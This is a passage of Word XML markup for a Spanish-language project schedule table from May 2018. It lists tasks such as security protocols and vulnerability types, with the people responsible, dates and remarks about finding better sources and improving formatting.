            <w:r w:rsidR="004B09FB" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="004B09FB">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17</w:t>
            </w:r>
            <w:r w:rsidR="004B09FB">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/05</w:t>
            </w:r>
            <w:r w:rsidR="004B09FB" w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="004B09FB" w:rsidRPr="00977D14" w:rsidRDefault="004B09FB" w:rsidP="004B09FB">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tab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Conseguir mejores fuentes ya que no existe mucha información en la biblioteca digital de la institución, por lo que es recomendable buscar bibliotecas externas que nos puedan ayudar a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>tener información certera y actualizada.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7A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Borders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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Medios digitales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
          <w:p w:rsidR="00471260" w:rsidRDefault="00471260" w:rsidP="00471260">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EAMM</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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AMG</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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12/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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15/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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13/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Al igual que en la tarea previamente mencionada para un mejor desarrollo de este apartado tratar de buscar información externa a la biblioteca digital de la institución ya que existe muy poco sobre estos temas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7AEC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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Protocolos de seguridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
          <w:p w:rsidR="00471260" w:rsidRDefault="00471260" w:rsidP="00471260">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EAMM</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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12/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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15/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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13/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Mejorar el formato que se le muestra a lector en este apartado ya que quizá sea muy cansado para el lector.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7A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Borders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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Tipos de vulnerabilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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p>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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MRG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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12/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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15/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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13/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Buscar más información actualizada del año en curso ya que el estudio donde se basó en este apartado lleva hasta el año </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>pasado la cual es certera pero quizá durante este año han surgido nuevos tipos de vulnerabilidad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidTr="003A7AEC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="0025575A" w:rsidRDefault="0025575A" w:rsidP="00471260">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="0"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025575A">
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRDefault="00471260" w:rsidP="00471260">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Arranque del proyecto(Carta de inicio del proyecto-Perfiles de los participantes y del administrador)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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MRG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1489" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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12/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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15/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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13/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00471260" w:rsidRPr="00977D14" w:rsidRDefault="00471260" w:rsidP="00471260">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17/05</w:t>
            </w:r>
            <w:r w:rsidRPr="00977D14">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>/2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
